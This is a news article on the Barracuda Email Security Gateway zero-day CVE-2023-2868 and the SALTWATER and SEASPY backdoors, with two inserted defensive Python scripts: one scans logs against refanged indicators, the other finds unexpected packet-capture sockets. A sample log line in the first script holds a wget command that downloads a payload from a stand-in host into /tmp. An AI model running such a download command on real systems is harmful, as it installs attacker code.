Barracuda tells customers to dump infected email security appliances after breach
Customers were first hit in October 2022. End user telemetry flagged something amiss this month... IOCs and YARA rules now shared.
Barracuda, a cybersecurity company with 200,000 customers and 5,000 channel partners, says some users of its Email Security Gateway (ESG) appliances were breached via a zero day over eight months ago – and is now urging those affected to dump the compromised appliance and contact it for a physical replacement, despite issuing a patch.
Barracuda ESG appliance versions 5.1.3.001 through 9.2.0.006 are affected by the vulnerability, tracked as CVE-2023-2868. It was found after customers reported anomalous traffic from the appliances and Barracuda called in incident responders from Mandiant, who identified a remote command injection vulnerability that had been exploited since October 2022.
Barracuda vulnerability: Custom malware deployed
Among four recommended actions, Barracuda on May 30 told customers to “discontinue the use of the compromised ESG appliance” and contact Barracuda support to “obtain a new ESG virtual or hardware appliance.”
(Customers should also check the appliances were getting updates, check logs for IOCs, and rotate credentials including “any connected LDAP/AD; Barracuda Cloud Control; FTP Server; SMB; any private TLS certificates…”)
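The "check logs for IOCs" step above is the one customers can act on immediately, and vendor IOC lists are usually published defanged (`192.0.2[.]44`, `hxxp://`), so they must be refanged before they can be matched against raw logs. The following added example, which is not code from Barracuda, Mandiant or the article, parses a constructed placeholder IOC feed, refangs it, and scans constructed syslog-style lines for IP, domain, URL and MD5 hits. The log format, the indicator values and the `bsmtpd` line contents are all constructed for illustration; the real feed and real appliance logs would be substituted in.

```python
import re

# Constructed placeholder IOC list in the defanged style vendor advisories use.
# These are NOT Barracuda's or Mandiant's published indicators; substitute the real feed.
IOC_FEED = """\
# kind,value
ip,192.0.2[.]44
domain,example[.]invalid
url,hxxp://example[.]invalid/install
md5,0123456789abcdef0123456789abcdef
"""

# Constructed syslog-style lines standing in for appliance logs (not real ESG output).
SAMPLE_LOGS = [
    "Jun 01 03:12:07 esg bsmtpd[2231]: connect from [203.0.113.9]",
    "Jun 01 03:12:09 esg bsmtpd[2231]: client=[192.0.2.44] helo=mail.example.invalid",
    "Jun 01 03:13:40 esg bsmtpd[2231]: disconnect from [203.0.113.9]",
    "Jun 01 03:14:02 esg sh[2290]: wget http://example.invalid/install -O /tmp/x",
    "Jun 01 03:14:05 esg sh[2290]: md5 0123456789ABCDEF0123456789ABCDEF /tmp/x",
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HEX32 = re.compile(r"\b[0-9a-f]{32}\b")


def refang(value):
    """Undo common defanging so the indicator can be matched literally against logs."""
    v = value.strip()
    v = v.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    v = re.sub(r"^hxxp", "http", v, flags=re.IGNORECASE)
    return v.lower()


def parse_ioc_feed(text):
    """Return {kind: set(refanged values)} from a 'kind,value' feed with # comments."""
    iocs = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        kind, _, value = line.partition(",")
        iocs.setdefault(kind.strip().lower(), set()).add(refang(value))
    return iocs


def scan_line(line, iocs):
    """Return [(kind, value)] for every indicator that appears in one log line."""
    hits = []
    lower = line.lower()
    for ip in IPV4.findall(line):
        if ip in iocs.get("ip", ()):
            hits.append(("ip", ip))
    for domain in sorted(iocs.get("domain", ())):
        # Match the domain itself or a subdomain (mail.example.invalid), but not an
        # unrelated label that merely ends with it (notexample.invalid).
        if re.search(r"(?<![\w-])" + re.escape(domain) + r"(?![\w-])", lower):
            hits.append(("domain", domain))
    for url in sorted(iocs.get("url", ())):
        if url in lower:
            hits.append(("url", url))
    for digest in HEX32.findall(lower):
        if digest in iocs.get("md5", ()):
            hits.append(("md5", digest))
    return hits


def scan_logs(lines, iocs):
    """Return [(line_number, kind, value)] across all lines, 1-indexed."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for kind, value in scan_line(line, iocs):
            findings.append((n, kind, value))
    return findings


if __name__ == "__main__":
    for n, kind, value in scan_logs(SAMPLE_LOGS, parse_ioc_feed(IOC_FEED)):
        print(f"line {n}: {kind} indicator {value}")
```

A hit on an outbound fetch or an unexpected client IP is a reason to treat the box as compromised and follow the replacement and credential-rotation steps rather than to keep patching it in place.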
The suggestion (certainly the public one) after a compromise that customers should dump an appliance and get in touch for a replacement remains highly unusual. It was not immediately clear how many replacement boxes Barracuda expects to have to ship; with its response to the breaches still ongoing, it has not put a number on the affected customers.
Barracuda should be applauded for its transparency around the incident and for rapidly sharing indicators of compromise (IOCs) and other forensics from Mandiant, which found that customers had been hit with previously unknown custom malware strains including a backdoor dubbed “Saltwater”. Industry observers will nonetheless be frustrated to once again see tools bought to improve security doing precisely the opposite.
(Two other recent examples are the widespread compromise of Fortinet devices and the exploitation of Sophos firewalls in 2022.)
The two custom malware samples found were:
SALTWATER: “A trojanized module for the Barracuda SMTP daemon (bsmtpd) that contains backdoor functionality. The capabilities of SALTWATER include the ability to upload or download arbitrary files, execute commands, as well as proxy and tunneling capabilities.”
SEASPY: An x64 ELF persistence backdoor that poses as a legitimate Barracuda Networks service and establishes itself as a PCAP filter, specifically monitoring traffic on port 25 (SMTP). SEASPY also contains backdoor functionality that is activated by a ‘magic packet’.
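A backdoor that "establishes itself as a PCAP filter" has to hold a packet-capture socket, which on Linux shows up as an AF_PACKET entry in `/proc/net/packet`. The added example below, written for this article and not taken from Barracuda or Mandiant, enumerates those sockets, maps each socket inode back to the owning process through `/proc/<pid>/fd`, and reports any holder that is not on a defender's expected list. The `/proc/net/packet` snapshot, the process table and the expected-process list are constructed for illustration, and applying the check to an ESG appliance is an assumption: it is a generic Linux host check, useful on any system where an unexpected process is capturing SMTP traffic.

```python
import os
import re

# Constructed snapshot of /proc/net/packet. Column order follows the kernel's af_packet.c:
# sk RefCnt Type Proto Iface R Rmem User Inode. Proto 0003 is ETH_P_ALL (capture everything).
PROC_NET_PACKET = """\
sk       RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9c1e4a1c0000 3      3    0003   2     1 0      0      31337
ffff9c1e4a1c0800 3      3    0003   2     1 0      0      40404
"""

# Constructed process table shaped like what read_live_procs() returns:
# pid -> comm (15-char kernel task name) and the targets of its /proc/<pid>/fd links.
# "svc-placeholder" stands in for a process masquerading as a vendor service.
FAKE_PROCS = {
    1201: {"comm": "tcpdump", "fds": ["socket:[31337]", "/dev/null"]},
    2290: {"comm": "svc-placeholder", "fds": ["socket:[40404]", "pipe:[555]"]},
    777: {"comm": "bsmtpd", "fds": ["socket:[12]", "socket:[13]"]},
}

# Processes the defender expects to hold packet sockets on this host (assumption).
EXPECTED_CAPTURE_PROCS = {"tcpdump"}


def parse_packet_sockets(text):
    """Parse /proc/net/packet into [{proto, iface, inode}], skipping the header."""
    sockets = []
    for line in text.splitlines()[1:]:
        parts = line.split()
        if len(parts) < 9:
            continue
        sockets.append({"proto": int(parts[3], 16), "iface": int(parts[4]), "inode": int(parts[8])})
    return sockets


def socket_inode(link_target):
    """Return the inode from an fd link like 'socket:[31337]', else None."""
    m = re.fullmatch(r"socket:\[(\d+)\]", link_target)
    return int(m.group(1)) if m else None


def map_inodes_to_procs(procs):
    """Return {socket inode: (pid, comm)} from a process table."""
    owners = {}
    for pid, info in procs.items():
        for target in info["fds"]:
            ino = socket_inode(target)
            if ino is not None:
                owners[ino] = (pid, info["comm"])
    return owners


def find_unexpected_capturers(packet_text, procs, expected):
    """Packet sockets whose owner is not an expected capture process (or has no visible owner)."""
    owners = map_inodes_to_procs(procs)
    findings = []
    for sock in parse_packet_sockets(packet_text):
        pid, comm = owners.get(sock["inode"], (None, "<unknown>"))
        if comm not in expected:
            findings.append({"pid": pid, "comm": comm, "inode": sock["inode"], "proto": sock["proto"]})
    return findings


def read_live_procs():
    """Build the same table from a real Linux /proc (needs root to read other users' fds)."""
    procs = {}
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            fds = [os.readlink(f"/proc/{pid}/fd/{fd}") for fd in os.listdir(f"/proc/{pid}/fd")]
        except OSError:
            continue  # process exited or is not readable by this user
        procs[pid] = {"comm": comm, "fds": fds}
    return procs


if __name__ == "__main__":
    for f in find_unexpected_capturers(PROC_NET_PACKET, FAKE_PROCS, EXPECTED_CAPTURE_PROCS):
        print(f"unexpected packet socket: pid={f['pid']} comm={f['comm']} inode={f['inode']} proto=0x{f['proto']:04x}")
```

On a live host, replace `FAKE_PROCS` with `read_live_procs()` and the snapshot with the contents of `/proc/net/packet`; a socket whose inode maps to no readable process is itself worth reporting, since that is what a hidden or privileged capturer would look like to an unprivileged scan.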